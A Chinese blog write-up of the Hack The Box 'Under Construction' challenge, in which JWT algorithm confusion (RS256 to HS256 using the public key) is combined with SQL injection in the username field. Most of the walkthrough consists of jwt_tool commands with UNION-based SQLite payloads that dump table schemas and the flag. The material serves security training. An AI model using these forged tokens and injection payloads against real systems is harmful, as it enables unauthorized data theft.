hackthebox-Tracks-Beginner_Track-Under_Construction

文章描述了一种针对JWT令牌的安全漏洞,通过篡改JWT头部的算法,将RSA改为HMAC,结合SQL注入,可以操控数据库。使用jwt_tool工具,攻击者能修改token并查询数据库,最终获取敏感信息,例如文章中提到的flag。
摘要由CSDN通过智能技术生成

随机输入账号密码

admin/admin

并用bp抓包

尝试注册

重新登录

能看到给了一个cookie,而且很符合jwt的风格

拿到jwt.io中解析一下,能看到公钥。

接着去分析以下源码

在helpers下面的DBhelper.js。由第五行可知数据库为sqlite。由11行可知,这个地方直接拼接了参数,所以是存在SQL注入的。

routes中显示网站有四个页面,分别是/,post以及get请求的auth,logout。

这四个部分的功能都非常的简单,POST请求根据register字段的值判断登录/注册,/logout清除session值,/auth返回auth.html页面,在GET请求/时,需要先通过JWT内的值判断用户是否存在,再进行页面跳转或错误信息,判断过程首先要执行AuthMiddleware函数,返回成功后再执行DBHlper.getUser(username)函数,如果username在数据数据库中存在的话,就会跳转至index.html页面,也就是登录后看到的页面了。

顺着引用的顺序,去看看authmiddlewave.js文件。

大概功能就是返回JWT解码后的username值,然后这个值就会被拿去DBHlper.getUser(username)函数比对,接着去JWTHelper.js文件

JWTHelper.js中出现了漏洞,JWT密钥混淆,其含义是:可以通过改头部的算法的方式,将RSA加密算法修改为HMAC,这样的结果就是服务端会直接使用HS256,并且把传过去的公钥(RSA的公钥)看作是当前算法(HMAC)的密钥来进行验签。

在进行完AuthMiddleware函数的流程后,进行下一步DBHlper.getUser(username),这个开头已经说了,存在注入,那么这就好办了,jwt我们可以生成,而且username字段就是我们要注入的点。

使用 jwt_tool 工具(https://www.tariqhawis.com/htb-under-construction-web-challange/)

git clone https://github.com/ticarpi/jwt_tool

pip3 install pycryptodomex

视频:https://www.reddit.com/r/hackthebox/comments/vqfvt2/jwt_token_exploit_with_sql_injection_hackthebox/

token为原token

keypub.pem为公钥

python3 ./jwt_tool/jwt_tool.py $(cat ./token) -I -pc username -pv "test1" -X k -pk ./keypub.pem

python3 ./jwt_tool/jwt_tool.py $(cat ./token) -I -pc username -pv "test2" -X k -pk ./keypub.pem

成功修改token

尝试进行注入

python3 ./jwt_tool/jwt_tool.py $(cat ./token) -I -pc username -pv "test1' order by 3 --+" -X k -pk ./keypub.pem

python3 ./jwt_tool/jwt_tool.py $(cat ./token) -I -pc username -pv "test1' order by 4 --+" -X k -pk ./keypub.pem

输出个数为3

python3 ./jwt_tool/jwt_tool.py $(cat ./token) -I -pc username -pv "test1' and 1=0 union all select 111111, 222222222, 33333333 --+" -X k -pk ./keypub.pem

可见的输出为第二个

查询数据库版本

python3 ./jwt_tool/jwt_tool.py $(cat ./token) -I -pc username -pv "test1' and 1=0 union all select 111111, sqlite_version(), 33333333 --+" -X k -pk ./keypub.pem

查询当前数据库的表

python3 ./jwt_tool/jwt_tool.py $(cat ./token) -I -pc username -pv "test1' and 1=0 union all select 111111, group_concat(tbl_name), 33333333 from sqlite_master --+" -X k -pk ./keypub.pem

sqlite_master 为 sqlite的默认数据库

flag_storage, sqlite_sequence, users 三个表

显示所有字段

python3 ./jwt_tool/jwt_tool.py $(cat ./token) -I -pc username -pv "test1' and 1=0 union all select 111111, group_concat(sql), 33333333 from sqlite_master --+" -X k -pk ./keypub.pem

显示 flag_storage 列中的 top_secret_flaag 字段的内容

python3 ./jwt_tool/jwt_tool.py $(cat ./token) -I -pc username -pv "test1' and 1=0 union all select 111111, group_concat(top_secret_flaag), 33333333 from flag_storage --+" -X k -pk ./keypub.pem

获取到flag

HTB{d0n7_3xp053_y0ur_publ1ck3y}

  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
### 支持向量机非线性回归通用MATLAB程序解析 #### 一、概述 本文将详细介绍一个基于MATLAB的支持向量机(SVM)非线性回归的通用程序。该程序采用支持向量机方法来实现数据的非线性回归,并通过不同的核函数设置来适应不同类型的数据分布。此外,该程序还提供了数据预处理的方法,使得用户能够更加方便地应用此程序解决实际问题。 #### 二、核心功能与原理 ##### 1. 支持向量机(SVM) 支持向量机是一种监督学习模型,主要用于分类和回归分析。对于非线性回归任务,SVM通过引入核技巧(kernel trick)将原始低维空间中的非线性问题转换为高维空间中的线性问题,从而实现有效的非线性建模。 ##### 2. 核函数 核函数的选择直接影响到模型的性能。本程序内置了三种常用的核函数: - **线性核函数**:`K(x, y) = x'y` - **多项式核函数**:`K(x, y) = (x'y + 1)^d` - **径向基函数(RBF)**:`K(x, y) = exp(-γ|x - y|^2)` 其中RBF核函数被广泛应用于非线性问题中,因为它可以处理非常复杂的非线性关系。本程序默认使用的是RBF核函数,参数`D`用于控制高斯核函数的宽度。 ##### 3. 数据预处理 虽然程序本身没有直接涉及数据预处理的过程,但在实际应用中,对数据进行适当的预处理是非常重要的。常见的预处理步骤包括归一化、缺失值处理等。 ##### 4. 模型参数 - **Epsilon**: ε-insensitive loss function的ε值,控制回归带宽。 - **C**: 松弛变量的惩罚系数,控制模型复杂度与过拟合的风险之间的平衡。 #### 三、程序实现细节 ##### 1. 函数输入与输出 - **输入**: - `X`: 输入特征矩阵,维度为(n, l),其中n是特征数量,l是样本数量。 - `Y`: 目标值向量,长度为l。 - `Epsilon`: 回归带宽。 - `C`: 松弛变量的惩罚系数。 - `D`: RBF核函数的参数。 - **输出**: - `Alpha1`: 正的拉格朗日乘子向量。 - `Alpha2`: 负的拉格朗日乘子向量。 - `Alpha`: 拉格朗日乘子向量。 - `Flag`: 标记向量,表示每个样本的类型。 - `B`: 偏置项。 ##### 2. 核心代码解析 程序首先计算所有样本间的核矩阵`K`,然后构建二次规划问题并求解得到拉格朗日乘子向量。根据拉格朗日乘子的值确定支持向量,并计算偏置项`B`。 - **核矩阵计算**:采用RBF核函数,通过`exp(-(sum((xi-xj).^2)/D))`计算任意两个样本之间的相似度。 - **二次规划**:构建目标函数和约束条件,使用`quadprog`函数求解最小化问题。 - **支持向量识别**:根据拉格朗日乘子的大小判断每个样本是否为支持向量,并据此计算偏置项`B`。 #### 四、程序扩展与优化 - **多核函数支持**:可以通过增加更多的核函数选项,提高程序的灵活性。 - **自动调参**:实现参数自动选择的功能,例如通过交叉验证选择最优的`Epsilon`和`C`值。 - **并行计算**:利用MATLAB的并行计算工具箱加速计算过程,特别是当样本量很大时。 #### 五、应用场景 该程序适用于需要进行非线性回归预测的场景,如经济预测、天气预报等领域。通过调整核函数和参数,可以有效应对各种类型的非线性问题。 ### 总结 本程序提供了一个支持向量机非线性回归的完整实现框架,通过灵活的核函数设置和参数调整,能够有效地处理非线性问题。对于需要进行回归预测的应用场景,这是一个非常实用且强大的工具。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值